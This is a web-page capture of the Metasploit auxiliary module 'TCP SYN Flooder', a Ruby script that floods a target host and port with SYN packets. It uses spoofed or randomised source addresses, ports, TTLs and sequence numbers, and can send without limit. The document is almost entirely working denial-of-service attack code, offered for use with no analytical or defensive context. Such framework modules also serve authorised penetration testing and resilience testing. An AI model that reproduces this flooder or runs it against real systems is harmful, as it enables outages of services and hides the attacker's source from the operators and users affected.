Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Capture
8
  include Msf::Auxiliary::Dos
9

10
  def initialize
11
    super(
12
      'Name'        => 'TCP SYN Flooder',
13
      'Description' => 'A simple TCP SYN flooder',
14
      'Author'      => 'kris katterjohn',
15
      'License'     => MSF_LICENSE
16
    )
17

18
    register_options([
19
      Opt::RPORT(80),
20
      OptAddress.new('SHOST', [false, 'The spoofable source address (else randomizes)']),
21
      OptInt.new('SPORT', [false, 'The source port (else randomizes)']),
22
      OptInt.new('NUM', [false, 'Number of SYNs to send (else unlimited)'])
23
    ])
24

25
    deregister_options('FILTER','PCAPFILE')
26
  end
27

28
  def sport
29
    datastore['SPORT'].to_i.zero? ? rand(65535)+1 : datastore['SPORT'].to_i
30
  end
31

32
  def rport
33
    datastore['RPORT'].to_i
34
  end
35

36
  def srchost
37
    datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')
38
  end
39

40
  def run
41
    open_pcap
42

43
    sent = 0
44
    num = datastore['NUM'] || 0
45

46
    print_status("SYN flooding #{rhost}:#{rport}...")
47

48
    p = PacketFu::TCPPacket.new
49
    p.ip_saddr = srchost
50
    p.ip_daddr = rhost
51
    p.tcp_dport = rport
52
    p.tcp_flags.syn = 1
53

54
    while (num <= 0) or (sent < num)
55
      p.ip_ttl = rand(128)+128
56
      p.tcp_win = rand(4096)+1
57
      p.tcp_sport = sport
58
      p.tcp_seq = rand(0x100000000)
59
      p.recalc
60
      break unless capture_sendto(p,rhost)
61
      sent += 1
62
    end
63

64
    close_pcap
65
  end
66
end
67

68